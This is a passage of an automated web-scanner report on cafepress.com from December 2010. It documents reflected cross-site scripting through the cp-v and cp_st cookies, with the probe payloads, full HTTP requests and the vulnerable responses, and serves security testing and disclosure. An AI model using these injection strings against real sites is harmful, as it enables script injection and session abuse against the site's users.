Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:15 GMT; path=/
Set-Cookie: cp_sc=100245; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:15 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59443

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
= 'cafepress.com';


window.cafepress.originCountryCode = 'US'

window.cafepress.tealeaf = {};
window.cafepress.tealeaf.pageLandingType = 'SearchResults'
window.cafepress.tealeaf.searchTerm = '64dd9</script><script>alert(1)</script>4516792b671'
window.cafepress.tealeaf.salesChannel = 'Marketplace'
window.cafepress.tealeaf.trafficMedium = 'OMM'
window.cafepress.tealeaf.utmTracking = ''
window.cafepress.tealeaf.abTestString = 'EXP_08_00:C
...[SNIP]...

1.38. http://www.cafepress.com/+ipad-cases [cp-v cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cafepress.com
Path:   /+ipad-cases

Issue detail

The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4658a"-alert(1)-"85663dcf2b1 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /+ipad-cases HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA4658a"-alert(1)-"85663dcf2b1; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; 
__utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW13
Cteonnt-Length: 88289
Date: Sun, 26 Dec 2010 13:46:48 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:47 GMT; path=/
Set-Cookie: cp_sc=202454; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:47 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 88289

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T";

   
   s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA4658a"-alert(1)-"85663dcf2b1";

   s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID
   if (s.eVar26 == "")
   {
       
       if ("" == "affiliate")
       {
           s.eVar26 = "2099"; //2099 = affiliate
       }
       el
...[SNIP]...

1.39. http://www.cafepress.com/+ipad-cases [cp_st cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cafepress.com
Path:   /+ipad-cases

Issue detail

The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload da017</script><script>alert(1)</script>5b17e49d25b was submitted in the cp_st cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /+ipad-cases HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=da017</script><script>alert(1)</script>5b17e49d25b; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; 
tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW27
ntCoent-Length: 88378
Date: Sun, 26 Dec 2010 13:46:45 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:45 GMT; path=/
Set-Cookie: cp_sc=202454; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:45 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 88378

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
= 'cafepress.com';


window.cafepress.originCountryCode = 'US'

window.cafepress.tealeaf = {};
window.cafepress.tealeaf.pageLandingType = 'SearchResults'
window.cafepress.tealeaf.searchTerm = 'da017</script><script>alert(1)</script>5b17e49d25b'
window.cafepress.tealeaf.salesChannel = 'Marketplace'
window.cafepress.tealeaf.trafficMedium = 'OMM'
window.cafepress.tealeaf.utmTracking = ''
window.cafepress.tealeaf.abTestString = 'EXP_08_00:C
...[SNIP]...

1.40. http://www.cafepress.com/+iphone-cases [cp-v cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cafepress.com
Path:   /+iphone-cases

Issue detail

The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e1695"-alert(1)-"e836931d7c9 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /+iphone-cases HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BAe1695"-alert(1)-"e836931d7c9; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; 
__utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW15
Cteonnt-Length: 65237
Date: Sun, 26 Dec 2010 13:48:49 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:49 GMT; path=/
Set-Cookie: cp_sc=202063; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:49 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 65237

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T";

   
   s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BAe1695"-alert(1)-"e836931d7c9";

   s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID
   if (s.eVar26 == "")
   {
       
       if ("" == "affiliate")
       {
           s.eVar26 = "2099"; //2099 = affiliate
       }
       el
...[SNIP]...

1.41. http://www.cafepress.com/+iphone-cases [cp_st cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cafepress.com
Path:   /+iphone-cases

Issue detail

The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4b572</script><script>alert(1)</script>4f6addec85e was submitted in the cp_st cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /+iphone-cases HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=4b572</script><script>alert(1)</script>4f6addec85e; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; 
tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW17
Cteonnt-Length: 65254
Date: Sun, 26 Dec 2010 13:48:48 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:48 GMT; path=/
Set-Cookie: cp_sc=202063; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:48 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 65254

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
= 'cafepress.com';


window.cafepress.originCountryCode = 'US'

window.cafepress.tealeaf = {};
window.cafepress.tealeaf.pageLandingType = 'SearchResults'
window.cafepress.tealeaf.searchTerm = '4b572</script><script>alert(1)</script>4f6addec85e'
window.cafepress.tealeaf.salesChannel = 'Marketplace'
window.cafepress.tealeaf.trafficMedium = 'SEO'
window.cafepress.tealeaf.utmTracking = ''
window.cafepress.tealeaf.abTestString = 'EXP_08_00:C
...[SNIP]...

1.42. http://www.cafepress.com/+journals [cp-v cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cafepress.com
Path:   /+journals

Issue detail

The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c2b67"-alert(1)-"894c7ad5c8f was submitted in the cp-v cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /+journals HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BAc2b67"-alert(1)-"894c7ad5c8f; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; 
__utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW15
Cteonnt-Length: 59370
Date: Sun, 26 Dec 2010 13:49:10 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:10 GMT; path=/
Set-Cookie: cp_sc=100229; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:10 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59370

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T";

   
   s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BAc2b67"-alert(1)-"894c7ad5c8f";

   s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID
   if (s.eVar26 == "")
   {
       
       if ("" == "affiliate")
       {
           s.eVar26 = "2099"; //2099 = affiliate
       }
       el
...[SNIP]...

1.43. http://www.cafepress.com/+journals [cp_st cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cafepress.com
Path:   /+journals

Issue detail

The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b2e9e</script><script>alert(1)</script>cefee2eaa5b was submitted in the cp_st cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /+journals HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
